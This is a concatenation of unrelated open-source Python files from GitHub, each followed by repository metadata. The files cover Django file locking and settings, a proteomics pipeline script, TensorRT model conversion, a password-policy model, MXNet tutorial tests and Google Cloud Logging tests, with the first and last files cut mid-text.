import fcntl
LOCK_SH = fcntl.LOCK_SH # shared lock
LOCK_NB = fcntl.LOCK_NB # non-blocking
LOCK_EX = fcntl.LOCK_EX
except (ImportError, AttributeError):
# File locking is not supported.
LOCK_EX = LOCK_SH = LOCK_NB = 0
# Dummy functions that don't do anything.
def lock(f, flags):
# File is not locked
return False
def unlock(f):
# File is unlocked
return True
else:
def lock(f, flags):
ret = fcntl.flock(_fd(f), flags)
return ret == 0
def unlock(f):
ret = fcntl.flock(_fd(f), fcntl.LOCK_UN)
return ret == 0
|
{
"content_hash": "944137ba4020bfa3967d854cc12cf22d",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 89,
"avg_line_length": 31.079646017699115,
"alnum_prop": 0.5945330296127562,
"repo_name": "treyhunner/django",
"id": "63c7fda9bbb7f865ed2482bc6621fc278e2bd9ce",
"size": "3512",
"binary": false,
"copies": "27",
"ref": "refs/heads/master",
"path": "django/core/files/locks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "84168"
},
{
"name": "HTML",
"bytes": "224612"
},
{
"name": "JavaScript",
"bytes": "255642"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "12359346"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
import ursgal
import os
def main():
"""
Script to compare Percolator versions 2.08 and 3.2 using MSFragger as
search engine
"""
engine_list = [
"xtandem_vengeance",
]
params = {
"database": os.path.join(
os.pardir,
"example_data",
"Creinhardtii_281_v5_5_CP_MT_with_contaminants_target_decoy.fasta",
),
"modifications": [],
"csv_filter_rules": [["PEP", "lte", 0.01], ["Is decoy", "equals", "false"]],
"ftp_url": "ftp.peptideatlas.org",
"ftp_login": "PASS00269",
"ftp_password": "FI4645a",
"ftp_include_ext": [
"JB_FASP_pH8_2-3_28122012.mzML",
],
"ftp_output_folder": os.path.join(
os.pardir, "example_data", "percolator_version_comparison"
),
"http_url": "https://www.sas.upenn.edu/~sschulze/Creinhardtii_281_v5_5_CP_MT_with_contaminants_target_decoy.fasta",
"http_output_folder": os.path.join(os.pardir, "example_data"),
"infer_proteins": False,
"percolator_post_processing": "tdc",
}
if os.path.exists(params["ftp_output_folder"]) is False:
os.mkdir(params["ftp_output_folder"])
uc = ursgal.UController(profile="LTQ XL low res", params=params)
mzML_file = os.path.join(params["ftp_output_folder"], params["ftp_include_ext"][0])
if os.path.exists(mzML_file) is False:
uc.fetch_file(engine="get_ftp_files_1_0_0")
if os.path.exists(params["database"]) is False:
uc.fetch_file(engine="get_http_files_1_0_0")
validation_engine_list = ["percolator_2_08", "percolator_3_2_1"]
uc.params["visualization_label_positions"] = {}
for n, vce in enumerate(validation_engine_list):
uc.params["visualization_label_positions"][str(n)] = vce
for engine in engine_list:
unified_search_results = uc.search(
input_file=mzML_file,
engine=engine,
)
validated_and_filtered_files_list = []
for pc_version in validation_engine_list:
uc.params["prefix"] = pc_version
validated_file = uc.validate(
input_file=unified_search_results,
engine=pc_version,
)
filtered_file = uc.execute_misc_engine(
input_file=validated_file, engine="filter_csv"
)
validated_and_filtered_files_list.append(filtered_file)
uc.visualize(
input_files=validated_and_filtered_files_list,
engine="venndiagram_1_1_0",
)
return
if __name__ == "__main__":
main()
|
{
"content_hash": "226c769be0135c7572fd8ea2c3787e05",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 123,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.5784463061690784,
"repo_name": "ursgal/ursgal",
"id": "b56a4b606ef39ec13d0b2dc2ee54c1beef74156a",
"size": "2668",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "example_scripts/compare_percolator_versions.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2330138"
},
{
"name": "Shell",
"bytes": "780"
}
],
"symlink_target": ""
}
|
def main(j,jp):
recipe=jp.getCodeMgmtRecipe()
recipe.commit()
|
{
"content_hash": "5f4200e632955e658abfd222713b026b",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 33,
"avg_line_length": 17.75,
"alnum_prop": 0.6619718309859155,
"repo_name": "Jumpscale/jumpscale6_core",
"id": "6faf358b717dd7c40300b487620b290f1feed803",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/JumpScale/baselib/jpackages/templates/actions/code.commit.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3681"
},
{
"name": "HTML",
"bytes": "11738"
},
{
"name": "JavaScript",
"bytes": "70132"
},
{
"name": "Lua",
"bytes": "2162"
},
{
"name": "Python",
"bytes": "5848017"
},
{
"name": "Shell",
"bytes": "7692"
}
],
"symlink_target": ""
}
|
"""
Django settings for shop_lite project.
Generated by 'django-admin startproject' using Django 1.8.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf import global_settings
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-s$1@e-(sq5s@#s+2aj3m+bsj7kz76j2c6uab3x@5l&s53#rim'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'debug_toolbar',
'django_extensions',
'cart',
'changuito',
'crispy_forms',
'taggit',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# Changuito Middleware
'changuito.middleware.CartMiddleware',
)
ROOT_URLCONF = 'shop_lite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# insert your TEMPLATE_DIRS here
BASE_DIR,
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'shop_lite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('DATABASE_NAME', 'shop_lite'),
'USER': os.getenv('DATABASE_USER', 'shop_lite'),
'PASSWORD': os.getenv('DATABASE_PASSWORD', 'password'),
'HOST': os.getenv('DATABASE_HOST', '127.0.0.1'),
'PORT': os.getenv('DATABASE_PORT', '5432'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
)
## Begin Django Debug ToolBar Settings
##
def show_toolbar(request):
return True
DEBUG_TOOLBAR_CONFIG = {
"SHOW_TOOLBAR_CALLBACK" : show_toolbar,
}
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
#'debug_toolbar_session_panel.panels.SessionDebugPanel',
]
## End Django Debug toolbar settings
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
|
{
"content_hash": "b73c9babb9931f3311ff8c63c45a77a5",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 71,
"avg_line_length": 26.680473372781066,
"alnum_prop": 0.6801951652251054,
"repo_name": "sidja/Django_Shop_Lite",
"id": "1ee58bca7df287ced6b4f281c8c86aa7d948dfc9",
"size": "4509",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "shop_lite/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11026"
},
{
"name": "HTML",
"bytes": "43928"
},
{
"name": "JavaScript",
"bytes": "6873"
},
{
"name": "Python",
"bytes": "56579"
},
{
"name": "Shell",
"bytes": "1573"
}
],
"symlink_target": ""
}
|
from copy import copy
from tornado.testing import gen_test
from tornado.web import Application
from . import RESTTestHandler
from .server import AsyncRESTTestCase
class Handler(RESTTestHandler):
COOKIES = [
(('foo', 'baz'), dict(expires_days=20)),
(('bar', '*'), dict(expires_days=20)),
(('spam', 'egg'), dict()),
]
def get(self, *args, **kwargs):
for args, kwargs in self.COOKIES:
self.set_cookie(*args, **kwargs)
self.response({})
def post(self, *args, **kwargs):
assert self.get_cookie('foo') == 'baz'
assert self.get_cookie('bar') == '*'
assert self.get_cookie('spam') == 'egg'
self.response({})
class TestCopy(AsyncRESTTestCase):
def get_app(self):
return Application(handlers=[
('/', Handler),
])
@gen_test
def test_copy(self):
client = self.get_http_client()
yield client.get(self.api_url.format("/"))
clone = copy(client)
assert client is not clone
yield clone.post(self.api_url.format("/"), body={})
|
{
"content_hash": "0a8ab1f793b304f4ee075efa526aa415",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 59,
"avg_line_length": 23.97826086956522,
"alnum_prop": 0.5747960108794198,
"repo_name": "mosquito/rest-client",
"id": "03a5cd7cc7f3d472c5b9a123eb3bea073da17fb4",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_copy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20043"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function, unicode_literals
from amaascore.corporate_actions.corporate_action import CorporateAction
class Split(CorporateAction):
def __init__(self, asset_manager_id, corporate_action_id, record_date, ratio, corporate_action_status='Open',
asset_id=None, party_id=None, declared_date=None, settlement_date=None, elective=False, message=None,
description='', references=None, *args, **kwargs):
self.ratio = ratio
super(Split, self).__init__(asset_manager_id=asset_manager_id, corporate_action_id=corporate_action_id,
record_date=record_date, corporate_action_status=corporate_action_status,
asset_id=asset_id, party_id=party_id, declared_date=declared_date,
settlement_date=settlement_date, elective=elective, message=message,
description=description, references=references, *args, **kwargs)
@property
def ratio(self):
if hasattr(self, '_ratio'):
return self._ratio
@ratio.setter
def ratio(self, ratio):
"""
The split ratio of the corporate action - i.e. the ratio of new shares to old shares
:param ratio: A tuple representing (original_count, new_count). For example (1, 2) is a doubling stock split.
(3, 1) is a 3:1 reverse stock split.
:return:
"""
if isinstance(ratio, tuple):
self._ratio = ratio
else:
raise TypeError('Invalid ratio type: %s' % type(ratio))
|
{
"content_hash": "2d6141cb8618b382bcf2ab98646b3ac6",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 118,
"avg_line_length": 48.470588235294116,
"alnum_prop": 0.6122572815533981,
"repo_name": "amaas-fintech/amaas-core-sdk-python",
"id": "7e7e5bd60945097fc16f38bc5cd38546382b7031",
"size": "1648",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "amaascore/corporate_actions/split.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "618"
},
{
"name": "Python",
"bytes": "529460"
},
{
"name": "Shell",
"bytes": "42"
}
],
"symlink_target": ""
}
|
from trainer_config import TrainerConfig
from config import GeneralConfig
|
{
"content_hash": "a734e82e3aecb5bd41b2e726d5631005",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 40,
"avg_line_length": 36.5,
"alnum_prop": 0.8904109589041096,
"repo_name": "uaca/deepy",
"id": "e9fcda1f17d18bd993d4fa7ca0b7419ea736cbf4",
"size": "120",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "deepy/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "15998"
},
{
"name": "Jupyter Notebook",
"bytes": "99240"
},
{
"name": "Python",
"bytes": "273397"
},
{
"name": "Shell",
"bytes": "515"
}
],
"symlink_target": ""
}
|
"""Saves a SavedModel after TensorRT conversion.
The saved model is loaded and executed by tests to ensure backward
compatibility across TF versions.
The script may not work in TF1.x.
Instructions on how to use this script:
- Execute the script as follows:
python gen_tftrt_model
- Rename tftrt_saved_model to what makes sense for your test.
- Delete directory tf_saved_model unless you want to use it.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import Session
from tensorflow.python.compiler.tensorrt import trt_convert
from tensorflow.python.eager import def_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils
from tensorflow.python.training.tracking import tracking
def GetGraph(input1, input2, var):
"""Define graph."""
add = input1 + var
mul = input1 * add
add = mul + add
add = add + input2
out = array_ops.identity(add, name="output")
return out
def GenerateModelV2(tf_saved_model_dir, tftrt_saved_model_dir):
"""Generate and convert a model using TFv2 API."""
class SimpleModel(tracking.AutoTrackable):
"""Define model with a TF function."""
def __init__(self):
self.v = None
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 1, 1], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=[None, 1, 1], dtype=dtypes.float32)
])
def run(self, input1, input2):
if self.v is None:
self.v = variables.Variable([[[1.0]]], dtype=dtypes.float32)
return GetGraph(input1, input2, self.v)
root = SimpleModel()
# Saved TF model
# pylint: disable=not-callable
save(
root,
tf_saved_model_dir,
{signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: root.run})
# Convert TF model to TensorRT
converter = trt_convert.TrtGraphConverterV2(
input_saved_model_dir=tf_saved_model_dir)
converter.convert()
converter.save(tftrt_saved_model_dir)
def GenerateModelV1(tf_saved_model_dir, tftrt_saved_model_dir):
"""Generate and convert a model using TFv1 API."""
def SimpleModel():
"""Define model with a TF graph."""
def GraphFn():
input1 = array_ops.placeholder(
dtype=dtypes.float32, shape=[None, 1, 1], name="input1")
input2 = array_ops.placeholder(
dtype=dtypes.float32, shape=[None, 1, 1], name="input2")
var = variables.Variable([[[1.0]]], dtype=dtypes.float32, name="v1")
out = GetGraph(input1, input2, var)
return g, var, input1, input2, out
g = ops.Graph()
with g.as_default():
return GraphFn()
g, var, input1, input2, out = SimpleModel()
signature_def = signature_def_utils.build_signature_def(
inputs={
"input1": utils.build_tensor_info(input1),
"input2": utils.build_tensor_info(input2)
},
outputs={"output": utils.build_tensor_info(out)},
method_name=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY)
saved_model_builder = builder.SavedModelBuilder(tf_saved_model_dir)
with Session(graph=g) as sess:
sess.run(var.initializer)
saved_model_builder.add_meta_graph_and_variables(
sess, [tag_constants.SERVING],
signature_def_map={
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: signature_def
})
saved_model_builder.save()
# Convert TF model to TensorRT
converter = trt_convert.TrtGraphConverter(
input_saved_model_dir=tf_saved_model_dir, is_dynamic_op=True)
converter.convert()
converter.save(tftrt_saved_model_dir)
if __name__ == "__main__":
GenerateModelV2(
tf_saved_model_dir="tf_saved_model",
tftrt_saved_model_dir="tftrt_saved_model")
|
{
"content_hash": "53c0a9ea36433b6b10170b5e89c02763",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 80,
"avg_line_length": 33.72222222222222,
"alnum_prop": 0.704165686043775,
"repo_name": "frreiss/tensorflow-fred",
"id": "40b0e6ac29640908a3182d5169f835fa80694ef0",
"size": "4937",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/compiler/tensorrt/test/testdata/gen_tftrt_model.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "6729"
},
{
"name": "Batchfile",
"bytes": "49527"
},
{
"name": "C",
"bytes": "871761"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "79093233"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "110545"
},
{
"name": "Go",
"bytes": "1852128"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "961600"
},
{
"name": "Jupyter Notebook",
"bytes": "549457"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1644156"
},
{
"name": "Makefile",
"bytes": "62398"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "303063"
},
{
"name": "PHP",
"bytes": "20523"
},
{
"name": "Pascal",
"bytes": "3982"
},
{
"name": "Pawn",
"bytes": "18876"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "40003007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Roff",
"bytes": "2472"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "Shell",
"bytes": "681596"
},
{
"name": "Smarty",
"bytes": "34740"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
from libraries import db_helper
from localsys.storage import db
class pw_policy_model:
# Notice that the values provided here are for password policy only.
# Values for other policies are available in models\policies.py
ranges = {"plen": [0, 6, 8, 10, 12],
"psets": [1, 2, 3, 4],
"pdict": [0, 1],
"phist": [1, 2, 3, 4],
"prenew": [0, 1, 2, 3],
"pattempts": [0, 1, 2],
"precovery": [0, 1, 2]}
bounds = {"plen": [0, 6, 12], # 0 means disabled
"psets": [1, 4],
"pdict": [0, 1], # categorical, thus same as range
"phist": [1, 4],
"prenew": [0, 3],
"pattempts": [0, 1, 2], # categorical, thus same as range
"precovery": [0, 1, 2]} # categorical, thus same as range
default = {"plen": 8, "psets": 2, "pdict": 0,
"phist": 1, "prenew": 1, "pattempts": 0,
"precovery": 1}
neutral = {"plen": 8, "psets": 2, "pdict": 1,
"phist": 2, "prenew": 1, "pattempts": 1,
"precovery": 1}
@staticmethod
def policy2datapoint(policy):
"""
Gets a pw_policy dictionary
:policy: The policy to read password policy parameters from
Returns a tuple of password policy items. All other parameters are ignored.
"""
return [policy["plen"], policy["psets"],
policy["pdict"], policy["phist"],
policy["prenew"], policy["pattempts"],
policy["precovery"]]
@classmethod
def update(cls, where, values):
"""
Generates query string using db_helper.update_helper.stringify, and runs db.query.
"""
return db.query(db_helper.update_helper.stringify('pw_policy', where, values), vars=locals())
# This method belongs to policies, not to pw_policy
# However, it seems that it is never used
@classmethod
def latest_policy(self, user_id):
policy = {
'location': "",
'employee': "",
'device': "",
'bdata': "", # why are these strings and not numbers?
'pdata': ""}
policy.update(self.default)
db_policy_all = db.select('policies', where="user_id=$user_id", order="date DESC", vars=locals())
if len(db_policy_all) > 0:
db_policy = db_policy_all[0]
db_bio = db.select('biometrics', where="id=$db_policy.bio_id", vars=locals())[0]
db_pass = db.select('passfaces', where="id=$db_policy.pass_id", vars=locals())[0]
db_pw = db.select('pw_policy_test', where="id=$db_policy.pw_id", vars=locals())[0]
policy["location"] = db_policy.location
policy["employee"] = db_policy.employee
policy["device"] = db_policy.device
policy["bdata"] = db_bio.bdata
policy["pdata"] = db_pass.pdata
policy["plen"] = db_pw.plen
policy["psets"] = db_pw.psets
policy["pdict"] = db_pw.pdict
policy["phist"] = db_pw.phist
policy["prenew"] = db_pw.prenew
policy["pattempts"] = db_pw.pattempts
policy["precovery"] = db_pw.precovery
return policy
def create_variation(self, policy, id, value):
new_policy = {}
for key in policy:
new_policy[key] = policy[key]
new_policy[id] = value
return new_policy
def get_range(self, policy, id):
"""
Get range of password policies for score graphs.
"""
msgs = []
sets = self.ranges
for value in sets[id]:
new_policy = self.create_variation(policy, id, value)
msg = {}
msg['id'] = id+str(value)
msg["data"] = new_policy
msgs.append(msg)
return msgs
|
{
"content_hash": "ec6049e188dffc3e8f2b4d8832a3a3f4",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 105,
"avg_line_length": 37.095238095238095,
"alnum_prop": 0.5214377406931964,
"repo_name": "mapto/sprks",
"id": "b845acf257f39ed8b43e1c1b01e587ff4c8d3df4",
"size": "3895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/pw_policy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "15370"
},
{
"name": "Dockerfile",
"bytes": "327"
},
{
"name": "HTML",
"bytes": "35629"
},
{
"name": "JavaScript",
"bytes": "75183"
},
{
"name": "Python",
"bytes": "124271"
},
{
"name": "Shell",
"bytes": "72"
}
],
"symlink_target": ""
}
|
"""
This file tests and ensures that all tutorials notebooks run
without warning or exception.
env variable MXNET_TUTORIAL_TEST_KERNEL controls which kernel to use
when running the notebook. e.g:
`export MXNET_TUTORIAL_TEST_KERNEL=python2`
env variable MXNET_TUTORIAL_TEST_NO_CACHE controls whether to clean the
temporary directory in which the notebook was run and re-download any
resource file. The default behaviour is to not clean the directory. Set to '1'
to force clean the directory. e.g:
`export MXNET_TUTORIAL_TEST_NO_CACHE=1`
NB: in the real CI, the tests will re-download everything since they start from
a clean workspace.
"""
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'utils'))
from notebook_test import run_notebook
# This is outdated and need to be completely redone.
TUTORIAL_DIR = os.path.join(os.path.dirname(__file__), '..', '..', 'docs', '_build', 'html', 'tutorials')
KERNEL = os.getenv('MXNET_TUTORIAL_TEST_KERNEL', None)
NO_CACHE = os.getenv('MXNET_TUTORIAL_TEST_NO_CACHE', False)
def _test_tutorial_nb(tutorial):
"""Run tutorial Jupyter notebook to catch any execution error.
Parameters
----------
tutorial : str
the name of the tutorial to be tested
Returns
-------
True if there are no warnings or errors.
"""
return run_notebook(tutorial, TUTORIAL_DIR, kernel=KERNEL, no_cache=NO_CACHE)
def test_basic_ndarray():
assert _test_tutorial_nb('basic/ndarray')
def test_basic_ndarray_indexing():
assert _test_tutorial_nb('basic/ndarray_indexing')
def test_basic_symbol():
assert _test_tutorial_nb('basic/symbol')
def test_basic_module():
assert _test_tutorial_nb('basic/module')
def test_basic_data():
assert _test_tutorial_nb('basic/data')
def test_basic_reshape_transpose():
assert _test_tutorial_nb('basic/reshape_transpose')
def test_gluon_customop():
assert _test_tutorial_nb('gluon/customop')
def test_gluon_custom_layer():
assert _test_tutorial_nb('gluon/custom_layer')
def test_gluon_transforms():
assert _test_tutorial_nb('gluon/transforms')
def test_gluon_data_augmentation():
assert _test_tutorial_nb('gluon/data_augmentation')
def test_gluon_datasets():
assert _test_tutorial_nb('gluon/datasets')
def test_gluon_naming():
assert _test_tutorial_nb('gluon/naming')
def test_gluon_ndarray():
assert _test_tutorial_nb('gluon/ndarray')
def test_gluon_mnist():
assert _test_tutorial_nb('gluon/mnist')
def test_gluon_autograd():
assert _test_tutorial_nb('gluon/autograd')
def test_gluon_gluon():
assert _test_tutorial_nb('gluon/gluon')
def test_gluon_multi_gpu():
assert _test_tutorial_nb('gluon/multi_gpu')
def test_gluon_save_load_params():
assert _test_tutorial_nb('gluon/save_load_params')
def test_gluon_hybrid():
assert _test_tutorial_nb('gluon/hybrid')
# https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_gluon_performance():
assert _test_tutorial_nb('gluon/performance')
"""
def test_gluon_pretrained_models():
assert _test_tutorial_nb('gluon/pretrained_models')
def test_gluon_learning_rate_finder():
assert _test_tutorial_nb('gluon/learning_rate_finder')
def test_gluon_learning_rate_schedules():
assert _test_tutorial_nb('gluon/learning_rate_schedules')
def test_gluon_learning_rate_schedules_advanced():
assert _test_tutorial_nb('gluon/learning_rate_schedules_advanced')
def test_gluon_info_gan():
assert _test_tutorial_nb('gluon/info_gan')
def test_gluon_fit_api_fashion_mnist():
assert _test_tutorial_nb('gluon/fit_api_tutorial')
def test_nlp_cnn():
assert _test_tutorial_nb('nlp/cnn')
def test_onnx_super_resolution():
assert _test_tutorial_nb('onnx/super_resolution')
def test_onnx_export_mxnet_to_onnx():
assert _test_tutorial_nb('onnx/export_mxnet_to_onnx')
def test_onnx_fine_tuning_gluon():
assert _test_tutorial_nb('onnx/fine_tuning_gluon')
def test_onnx_inference_on_onnx_model():
assert _test_tutorial_nb('onnx/inference_on_onnx_model')
def test_python_linear_regression():
assert _test_tutorial_nb('python/linear-regression')
def test_python_logistic_regression() :
assert _test_tutorial_nb('gluon/logistic_regression_explained')
def test_python_numpy_gotchas() :
assert _test_tutorial_nb('gluon/gotchas_numpy_in_mxnet')
def test_gluon_end_to_end():
assert _test_tutorial_nb('gluon/gluon_from_experiment_to_deployment')
def test_python_mnist():
assert _test_tutorial_nb('python/mnist')
def test_python_predict_image():
assert _test_tutorial_nb('python/predict_image')
def test_python_data_augmentation():
assert _test_tutorial_nb('python/data_augmentation')
def test_python_data_augmentation_with_masks():
assert _test_tutorial_nb('python/data_augmentation_with_masks')
def test_python_kvstore():
assert _test_tutorial_nb('python/kvstore')
def test_module_to_gluon():
assert _test_tutorial_nb('python/module_to_gluon')
def test_python_types_of_data_augmentation():
assert _test_tutorial_nb('python/types_of_data_augmentation')
#https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_python_profiler():
assert _test_tutorial_nb('python/profiler')
"""
def test_sparse_row_sparse():
assert _test_tutorial_nb('sparse/row_sparse')
def test_sparse_csr():
assert _test_tutorial_nb('sparse/csr')
def test_sparse_train():
assert _test_tutorial_nb('sparse/train')
def test_sparse_train_gluon():
assert _test_tutorial_nb('sparse/train_gluon')
def test_speech_recognition_ctc():
assert _test_tutorial_nb('speech_recognition/ctc')
def test_unsupervised_learning_gan():
assert _test_tutorial_nb('unsupervised_learning/gan')
def test_vision_large_scale_classification():
assert _test_tutorial_nb('vision/large_scale_classification')
def test_vision_cnn_visualization():
assert _test_tutorial_nb('vision/cnn_visualization')
def test_control_flow():
assert _test_tutorial_nb('control_flow/ControlFlowTutorial')
def test_amp():
assert _test_tutorial_nb('amp/amp_tutorial')
# https://github.com/apache/incubator-mxnet/issues/16181
"""
def test_mkldnn_quantization():
assert _test_tutorial_nb('mkldnn/mkldnn_quantization')
"""
|
{
"content_hash": "5aa67368c517acee321b7d41c2c53e49",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 105,
"avg_line_length": 30.468599033816425,
"alnum_prop": 0.7146028222609798,
"repo_name": "larroy/mxnet",
"id": "2ebd2f8e92cac92712f5d228b511f5a4661982c4",
"size": "7261",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "tests/tutorials/test_tutorials.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "1731"
},
{
"name": "Batchfile",
"bytes": "13130"
},
{
"name": "C",
"bytes": "227904"
},
{
"name": "C++",
"bytes": "9484781"
},
{
"name": "CMake",
"bytes": "157181"
},
{
"name": "Clojure",
"bytes": "622652"
},
{
"name": "Cuda",
"bytes": "1290387"
},
{
"name": "Dockerfile",
"bytes": "100732"
},
{
"name": "Groovy",
"bytes": "165549"
},
{
"name": "HTML",
"bytes": "40277"
},
{
"name": "Java",
"bytes": "205196"
},
{
"name": "Julia",
"bytes": "445413"
},
{
"name": "Jupyter Notebook",
"bytes": "3660357"
},
{
"name": "MATLAB",
"bytes": "34903"
},
{
"name": "Makefile",
"bytes": "148945"
},
{
"name": "Perl",
"bytes": "1558292"
},
{
"name": "PowerShell",
"bytes": "11743"
},
{
"name": "Python",
"bytes": "9656682"
},
{
"name": "R",
"bytes": "357994"
},
{
"name": "Raku",
"bytes": "9012"
},
{
"name": "SWIG",
"bytes": "161870"
},
{
"name": "Scala",
"bytes": "1304647"
},
{
"name": "Shell",
"bytes": "460507"
},
{
"name": "Smalltalk",
"bytes": "3497"
}
],
"symlink_target": ""
}
|
import os
import time
import google.auth
from google.api import monitored_resource_pb2
from google.cloud import logging_v2
from google.cloud.logging_v2.proto import log_entry_pb2
from google.cloud.logging_v2.proto import logging_pb2
class TestSystemLoggingServiceV2(object):
def test_write_log_entries(self):
_, project_id = google.auth.default()
client = logging_v2.LoggingServiceV2Client()
log_name = client.log_path(project_id, "test-{0}".format(time.time()))
resource = {}
labels = {}
entries = []
response = client.write_log_entries(
entries, log_name=log_name, resource=resource, labels=labels
)
|
{
"content_hash": "21b813dc37c96402db4818071d5f2aba",
"timestamp": "",
"source": "github",
"line_count": 22,
